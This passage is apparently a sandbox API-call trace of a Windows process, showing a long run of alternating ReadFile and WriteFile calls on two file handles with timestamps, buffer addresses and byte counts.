nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.307] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.308] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.308] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.310] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x312, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.311] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x336, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.316] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.318] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.319] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.323] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.325] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.326] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.327] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.329] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x145, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x151, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.333] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.339] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.342] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.343] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.344] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.344] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.346] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.348] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.348] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.349] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.350] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.350] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.352] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.353] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.353] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 